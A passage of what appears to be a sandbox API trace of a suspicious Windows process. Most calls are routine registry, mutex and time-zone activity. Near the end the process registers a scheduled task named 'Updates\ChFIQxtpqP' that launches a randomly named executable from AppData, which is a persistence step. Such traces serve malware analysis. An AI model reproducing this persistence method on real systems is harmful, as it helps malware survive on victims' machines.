lpcbData=0x24dae0*=0x0 | out: lpType=0x24dae4*=0x4, lpData=0x0, lpcbData=0x24dae0*=0x4) returned 0x0 [0044.210] RegQueryValueExW (in: hKey=0x2c4, lpValueName="First Counter", lpReserved=0x0, lpType=0x24dae4, lpData=0x24dad0, lpcbData=0x24dae0*=0x4 | out: lpType=0x24dae4*=0x4, lpData=0x24dad0*=0x1386, lpcbData=0x24dae0*=0x4) returned 0x0 [0044.210] RegCloseKey (hKey=0x2c4) returned 0x0 [0044.213] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net data provider for sqlserver\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dabc | out: phkResult=0x24dabc*=0x2c4) returned 0x0 [0044.213] RegQueryValueExW (in: hKey=0x2c4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x24dadc, lpData=0x0, lpcbData=0x24dad8*=0x0 | out: lpType=0x24dadc*=0x4, lpData=0x0, lpcbData=0x24dad8*=0x4) returned 0x0 [0044.213] RegQueryValueExW (in: hKey=0x2c4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x24dadc, lpData=0x24dac8, lpcbData=0x24dad8*=0x4 | out: lpType=0x24dadc*=0x4, lpData=0x24dac8*=0x3, lpcbData=0x24dad8*=0x4) returned 0x0 [0044.213] RegQueryValueExW (in: hKey=0x2c4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x24dadc, lpData=0x0, lpcbData=0x24dad8*=0x0 | out: lpType=0x24dadc*=0x4, lpData=0x0, lpcbData=0x24dad8*=0x4) returned 0x0 [0044.213] RegQueryValueExW (in: hKey=0x2c4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x24dadc, lpData=0x24dac8, lpcbData=0x24dad8*=0x4 | out: lpType=0x24dadc*=0x4, lpData=0x24dac8*=0x20000, lpcbData=0x24dad8*=0x4) returned 0x0 [0044.213] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x24dadc, lpData=0x0, lpcbData=0x24dad8*=0x0 | out: lpType=0x24dadc*=0x3, lpData=0x0, lpcbData=0x24dad8*=0x30a) returned 0x0 [0044.213] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x24dadc, lpData=0x2923308, lpcbData=0x24dad8*=0x30a | out: lpType=0x24dadc*=0x3, lpData=0x2923308*, lpcbData=0x24dad8*=0x30a) returned 0x0 [0044.216] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0044.218] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x24da18, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net data provider for sqlserver") returned 0x2c8 [0044.219] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x940000 [0044.220] VirtualQuery (in: lpAddress=0x940000, lpBuffer=0x24dabc, dwLength=0x1c | out: lpBuffer=0x24dabc*(BaseAddress=0x940000, AllocationBase=0x940000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0044.220] LocalFree (hMem=0x48d150) returned 0x0 [0044.220] RegCloseKey (hKey=0x2c4) returned 0x0 [0044.226] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2924820, cbSid=0x24da98 | out: pSid=0x2924820*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da98) returned 1 [0044.229] CreateMutexW (lpMutexAttributes=0x2924934, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0044.230] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0044.237] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2924b38, cbSid=0x24da5c | out: pSid=0x2924b38*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da5c) returned 1 [0044.237] CreateMutexW (lpMutexAttributes=0x2924c14, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x0 [0044.237] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Global\\.net data provider for sqlserver") returned 0x2cc [0044.238] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x1f4) returned 0x0 [0044.238] ReleaseMutex (hMutex=0x2cc) returned 1 [0044.238] CloseHandle (hObject=0x2cc) returned 1 [0044.240] GetCurrentProcessId () returned 0xad0 [0044.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xad0) returned 0x2cc [0044.241] GetProcessTimes (in: hProcess=0x2cc, lpCreationTime=0x24da60, lpExitTime=0x24da58, lpKernelTime=0x24da58, lpUserTime=0x24da58 | out: lpCreationTime=0x24da60, lpExitTime=0x24da58, lpKernelTime=0x24da58, lpUserTime=0x24da58) returned 1 [0044.241] CloseHandle (hObject=0x2cc) returned 1 [0044.242] ReleaseMutex (hMutex=0x2c4) returned 1 [0044.242] CloseHandle (hObject=0x2c4) returned 1 [0044.243] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x29257b0, cbSid=0x24da98 | out: pSid=0x29257b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da98) returned 1 [0044.243] CreateMutexW (lpMutexAttributes=0x292588c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0044.243] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0044.244] GetTimeZoneInformation (in: lpTimeZoneInformation=0x24d884 | out: lpTimeZoneInformation=0x24d884) returned 0x2 [0044.248] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x24d6d8 | out: pTimeZoneInformation=0x24d6d8) returned 0x2 [0044.250] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d7bc | out: phkResult=0x24d7bc*=0x2cc) returned 0x0 [0044.250] RegQueryValueExW (in: hKey=0x2cc, lpValueName="TZI", lpReserved=0x0, lpType=0x24d7d8, lpData=0x0, lpcbData=0x24d7d4*=0x0 | out: lpType=0x24d7d8*=0x3, lpData=0x0, lpcbData=0x24d7d4*=0x2c) returned 0x0 [0044.250] RegQueryValueExW (in: hKey=0x2cc, lpValueName="TZI", lpReserved=0x0, lpType=0x24d7d8, lpData=0x2926364, lpcbData=0x24d7d4*=0x2c | out: lpType=0x24d7d8*=0x3, lpData=0x2926364*, lpcbData=0x24d7d4*=0x2c) returned 0x0 [0044.251] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d610 | out: phkResult=0x24d610*=0x2d0) returned 0x0 [0044.251] RegQueryValueExW (in: hKey=0x2d0, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x24d62c, lpData=0x0, lpcbData=0x24d628*=0x0 | out: lpType=0x24d62c*=0x4, lpData=0x0, lpcbData=0x24d628*=0x4) returned 0x0 [0044.251] RegQueryValueExW (in: hKey=0x2d0, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x24d62c, lpData=0x24d618, lpcbData=0x24d628*=0x4 | out: lpType=0x24d62c*=0x4, lpData=0x24d618*=0x7d7, lpcbData=0x24d628*=0x4) returned 0x0 [0044.251] RegQueryValueExW (in: hKey=0x2d0, lpValueName="LastEntry", lpReserved=0x0, lpType=0x24d62c, lpData=0x0, lpcbData=0x24d628*=0x0 | out: lpType=0x24d62c*=0x4, lpData=0x0, lpcbData=0x24d628*=0x4) returned 0x0 [0044.252] RegQueryValueExW (in: hKey=0x2d0, lpValueName="LastEntry", lpReserved=0x0, lpType=0x24d62c, lpData=0x24d618, lpcbData=0x24d628*=0x4 | out: lpType=0x24d62c*=0x4, lpData=0x24d618*=0x7d8, lpcbData=0x24d628*=0x4) returned 0x0 [0044.252] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2007", lpReserved=0x0, lpType=0x24d62c, lpData=0x0, lpcbData=0x24d628*=0x0 | out: lpType=0x24d62c*=0x3, lpData=0x0, lpcbData=0x24d628*=0x2c) returned 0x0 [0044.252] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2007", lpReserved=0x0, lpType=0x24d62c, lpData=0x29268c8, lpcbData=0x24d628*=0x2c | out: lpType=0x24d62c*=0x3, lpData=0x29268c8*, lpcbData=0x24d628*=0x2c) returned 0x0 [0044.252] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2008", lpReserved=0x0, lpType=0x24d62c, lpData=0x0, lpcbData=0x24d628*=0x0 | out: lpType=0x24d62c*=0x3, lpData=0x0, lpcbData=0x24d628*=0x2c) returned 0x0 [0044.252] RegQueryValueExW (in: hKey=0x2d0, lpValueName="2008", lpReserved=0x0, lpType=0x24d62c, lpData=0x2926988, lpcbData=0x24d628*=0x2c | out: lpType=0x24d62c*=0x3, lpData=0x2926988*, lpcbData=0x24d628*=0x2c) returned 0x0 [0044.252] RegCloseKey (hKey=0x2d0) returned 0x0 [0044.253] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x24d7b0, lpData=0x0, lpcbData=0x24d7ac*=0x0 | out: lpType=0x24d7b0*=0x1, lpData=0x0, lpcbData=0x24d7ac*=0x20) returned 0x0 [0044.253] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x24d7b0, lpData=0x2926ad0, lpcbData=0x24d7ac*=0x20 | out: lpType=0x24d7b0*=0x1, lpData="@tzres.dll,-670", lpcbData=0x24d7ac*=0x20) returned 0x0 [0044.253] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x24d7b0, lpData=0x0, lpcbData=0x24d7ac*=0x0 | out: lpType=0x24d7b0*=0x1, lpData=0x0, lpcbData=0x24d7ac*=0x20) returned 0x0 [0044.253] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x24d7b0, lpData=0x2926b28, lpcbData=0x24d7ac*=0x20 | out: lpType=0x24d7b0*=0x1, lpData="@tzres.dll,-672", lpcbData=0x24d7ac*=0x20) returned 0x0 [0044.253] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x24d7b0, lpData=0x0, lpcbData=0x24d7ac*=0x0 | out: lpType=0x24d7b0*=0x1, lpData=0x0, lpcbData=0x24d7ac*=0x20) returned 0x0 [0044.253] RegQueryValueExW (in: hKey=0x2cc, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x24d7b0, lpData=0x2926b80, lpcbData=0x24d7ac*=0x20 | out: lpType=0x24d7b0*=0x1, lpData="@tzres.dll,-671", lpcbData=0x24d7ac*=0x20) returned 0x0 [0044.255] CoTaskMemAlloc (cb=0x20c) returned 0x4a1138 [0044.255] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x4a1138 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0044.256] CoTaskMemFree (pv=0x4a1138) [0044.257] CoTaskMemAlloc (cb=0x20c) returned 0x4a1138 [0044.257] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x24d7cc, pwszFileMUIPath=0x4a1138, pcchFileMUIPath=0x24d7d0, pululEnumerator=0x24d7c4 | out: pwszLanguage=0x0, pcchLanguage=0x24d7cc, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x24d7d0, pululEnumerator=0x24d7c4) returned 1 [0044.262] CoTaskMemFree (pv=0x0) [0044.262] CoTaskMemFree (pv=0x4a1138) [0044.262] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x6b0001 [0044.266] CoTaskMemAlloc (cb=0x3ec) returned 0x4a7c58 [0044.266] LoadStringW (in: hInstance=0x6b0001, uID=0x29e, lpBuffer=0x4a7c58, cchBufferMax=500 | out: lpBuffer="(UTC+10:00) Canberra, Melbourne, Sydney") returned 0x27 [0044.267] CoTaskMemFree (pv=0x4a7c58) [0044.267] FreeLibrary (hLibModule=0x6b0001) returned 1 [0044.267] CoTaskMemAlloc (cb=0x20c) returned 0x4a1138 [0044.268] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x4a1138 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0044.268] CoTaskMemFree (pv=0x4a1138) [0044.268] CoTaskMemAlloc (cb=0x20c) returned 0x4a1138 [0044.268] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x24d7cc, pwszFileMUIPath=0x4a1138, pcchFileMUIPath=0x24d7d0, pululEnumerator=0x24d7c4 | out: pwszLanguage=0x0, pcchLanguage=0x24d7cc, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x24d7d0, pululEnumerator=0x24d7c4) returned 1 [0044.268] CoTaskMemFree (pv=0x0) [0044.268] CoTaskMemFree (pv=0x4a1138) [0044.268] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x6b0001 [0044.269] CoTaskMemAlloc (cb=0x3ec) returned 0x4a7c58 [0044.269] LoadStringW (in: hInstance=0x6b0001, uID=0x2a0, lpBuffer=0x4a7c58, cchBufferMax=500 | out: lpBuffer="AUS Eastern Standard Time") returned 0x19 [0044.269] CoTaskMemFree (pv=0x4a7c58) [0044.269] FreeLibrary (hLibModule=0x6b0001) returned 1 [0044.270] CoTaskMemAlloc (cb=0x20c) returned 0x4a1138 [0044.270] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x4a1138 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0044.270] CoTaskMemFree (pv=0x4a1138) [0044.270] CoTaskMemAlloc (cb=0x20c) returned 0x4a1138 [0044.270] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x24d7cc, pwszFileMUIPath=0x4a1138, pcchFileMUIPath=0x24d7d0, pululEnumerator=0x24d7c4 | out: pwszLanguage=0x0, pcchLanguage=0x24d7cc, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x24d7d0, pululEnumerator=0x24d7c4) returned 1 [0044.271] CoTaskMemFree (pv=0x0) [0044.271] CoTaskMemFree (pv=0x4a1138) [0044.271] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x6b0001 [0044.272] CoTaskMemAlloc (cb=0x3ec) returned 0x4a7c58 [0044.272] LoadStringW (in: hInstance=0x6b0001, uID=0x29f, lpBuffer=0x4a7c58, cchBufferMax=500 | out: lpBuffer="AUS Eastern Daylight Time") returned 0x19 [0044.272] CoTaskMemFree (pv=0x4a7c58) [0044.272] FreeLibrary (hLibModule=0x6b0001) returned 1 [0044.273] RegCloseKey (hKey=0x2cc) returned 0x0 [0044.275] ReleaseMutex (hMutex=0x2c4) returned 1 [0044.275] CloseHandle (hObject=0x2c4) returned 1 [0044.275] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x292a710, cbSid=0x24da98 | out: pSid=0x292a710*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da98) returned 1 [0044.275] CreateMutexW (lpMutexAttributes=0x292a7ec, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0044.276] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0044.276] ReleaseMutex (hMutex=0x2c4) returned 1 [0044.276] CloseHandle (hObject=0x2c4) returned 1 [0044.276] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x292af2c, cbSid=0x24da98 | out: pSid=0x292af2c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da98) returned 1 [0044.276] CreateMutexW (lpMutexAttributes=0x292b008, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0044.277] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0044.277] ReleaseMutex (hMutex=0x2c4) returned 1 [0044.277] CloseHandle (hObject=0x2c4) returned 1 [0044.277] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x292b75c, cbSid=0x24da98 | out: pSid=0x292b75c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da98) returned 1 [0044.278] CreateMutexW (lpMutexAttributes=0x292b838, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0044.278] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0044.278] ReleaseMutex (hMutex=0x2c4) returned 1 [0044.278] CloseHandle (hObject=0x2c4) returned 1 [0044.278] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x292bf90, cbSid=0x24da98 | out: pSid=0x292bf90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da98) returned 1 [0044.279] CreateMutexW (lpMutexAttributes=0x292c06c, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0044.279] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0044.279] ReleaseMutex (hMutex=0x2c4) returned 1 [0044.279] CloseHandle (hObject=0x2c4) returned 1 [0044.280] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x292c7b4, cbSid=0x24da98 | out: pSid=0x292c7b4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da98) returned 1 [0044.280] CreateMutexW (lpMutexAttributes=0x292c890, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0044.280] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0044.280] ReleaseMutex (hMutex=0x2c4) returned 1 [0044.280] CloseHandle (hObject=0x2c4) returned 1 [0044.281] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x292cfdc, cbSid=0x24da98 | out: pSid=0x292cfdc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da98) returned 1 [0044.281] CreateMutexW (lpMutexAttributes=0x292d0b8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0044.281] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0044.281] ReleaseMutex (hMutex=0x2c4) returned 1 [0044.281] CloseHandle (hObject=0x2c4) returned 1 [0044.282] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x292d7f8, cbSid=0x24da98 | out: pSid=0x292d7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da98) returned 1 [0044.282] CreateMutexW (lpMutexAttributes=0x292d8d4, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0044.282] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0044.282] ReleaseMutex (hMutex=0x2c4) returned 1 [0044.282] CloseHandle (hObject=0x2c4) returned 1 [0044.283] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x292e01c, cbSid=0x24da98 | out: pSid=0x292e01c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x24da98) returned 1 [0044.283] CreateMutexW (lpMutexAttributes=0x292e0f8, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x2c4 [0044.283] WaitForSingleObject (hHandle=0x2c4, dwMilliseconds=0x1f4) returned 0x0 [0044.283] ReleaseMutex (hMutex=0x2c4) returned 1 [0044.284] CloseHandle (hObject=0x2c4) returned 1 [0044.295] GetCurrentProcess () returned 0xffffffff [0044.295] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24d794 | out: TokenHandle=0x24d794*=0x2c4) returned 1 [0044.307] GetCurrentProcess () returned 0xffffffff [0044.307] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24d7a4 | out: TokenHandle=0x24d7a4*=0x2cc) returned 1 [0044.321] EtwEventRegister () returned 0x0 [0044.342] GetModuleHandleW (lpModuleName=0x0) returned 0x13e0000 [0044.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="_______SQL______Process______Available@0", cchWideChar=40, lpMultiByteStr=0x24e7ec, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x24e7a8 | out: lpMultiByteStr="_______SQL______Process______Available@0,SIp\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n") returned 1686 [0068.962] SysStringLen (param_1="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n") returned 0x695 [0068.962] VarBstrCat (in: bstrLeft=0x0, bstrRight="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n", pbstrResult=0x8c750 | out: pbstrResult=0x8c750) returned 0x0 [0068.962] free (_Block=0x8226d8) [0068.962] CloseHandle (hObject=0x108) returned 1 [0068.963] lstrlenW (lpString="") returned 0 [0068.963] malloc (_Size=0xc) returned 0x823e78 [0068.963] SysStringLen (param_1="") returned 0x0 [0068.963] free (_Block=0x823e78) [0068.963] lstrlenW (lpString="") returned 0 [0068.966] ITaskFolder:RegisterTask (in: This=0x823e38, Path="Updates\\ChFIQxtpqP", XmlText="\r\n\r\n \r\n 2014-10-25T14:27:44.8929027\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n \r\n true\r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n XDUWTFONO\\5p5NrGJn0jS HALPmcxz\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n StopExisting\r\n false\r\n true\r\n false\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\r\n \r\n \r\n", flags=2, UserId=0x8c78c*(varType=0x8, wReserved1=0x0, wReserved2=0x41b0, wReserved3=0x55, varVal1="", varVal2=0x5541b0), password=0x8c79c*(varType=0x0, wReserved1=0x55, wReserved2=0x0, wReserved3=0x0, varVal1=0x8c824, varVal2=0x76b07526), LogonType=0, sddl=0x8c7b0*(varType=0x0, wReserved1=0x55, wReserved2=0x41b0, wReserved3=0x55, varVal1=0x0, varVal2=0x0), ppTask=0x8c810 | out: ppTask=0x8c810*=0x823ea8) returned 0x0 [0069.076] GetProcessHeap () returned 0x530000 [0069.076] RtlAllocateHeap (HeapHandle=0x530000, Flags=0xc, Size=0x14) returned 0x5456e8 [0069.076] _memicmp (_Buf1=0x544c48, _Buf2=0xcc1ed8, _Size=0x7) returned 0 [0069.076] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x5466a8, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0069.076] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0069.076] GetProcessHeap () returned 0x530000 [0069.076] RtlAllocateHeap (HeapHandle=0x530000, Flags=0xc, Size=0x82) returned 0x5547c8 [0069.076] _vsnwprintf (in: _Buffer=0x8c81c, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x8c7c0 | out: _Buffer="SUCCESS: The scheduled task \"Updates\\ChFIQxtpqP\" has successfully been created.\n") returned 80 [0069.076] _fileno (_File=0x77032920) returned 1 [0069.076] _errno () returned 0x8207d8 [0069.076] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.076] _errno () returned 0x8207d8 [0069.077] GetFileType (hFile=0x7) returned 0x2 [0069.077] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.077] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x8c784 | out: lpMode=0x8c784) returned 1 [0069.078] __iob_func () returned 0x77032900 [0069.078] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.078] lstrlenW (lpString="SUCCESS: The scheduled task \"Updates\\ChFIQxtpqP\" has successfully been created.\n") returned 80 [0069.078] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8c81c*, nNumberOfCharsToWrite=0x50, lpNumberOfCharsWritten=0x8c7ac, lpReserved=0x0 | out: lpBuffer=0x8c81c*, lpNumberOfCharsWritten=0x8c7ac*=0x50) returned 1 [0069.079] IUnknown:Release (This=0x823ea8) returned 0x0 [0069.079] TaskScheduler:IUnknown:Release (This=0x823e38) returned 0x0 [0069.079] TaskScheduler:IUnknown:Release (This=0x823dd0) returned 0x1 [0069.079] lstrlenW (lpString="") returned 0 [0069.079] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmpF0A4.tmp") returned 60 [0069.079] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 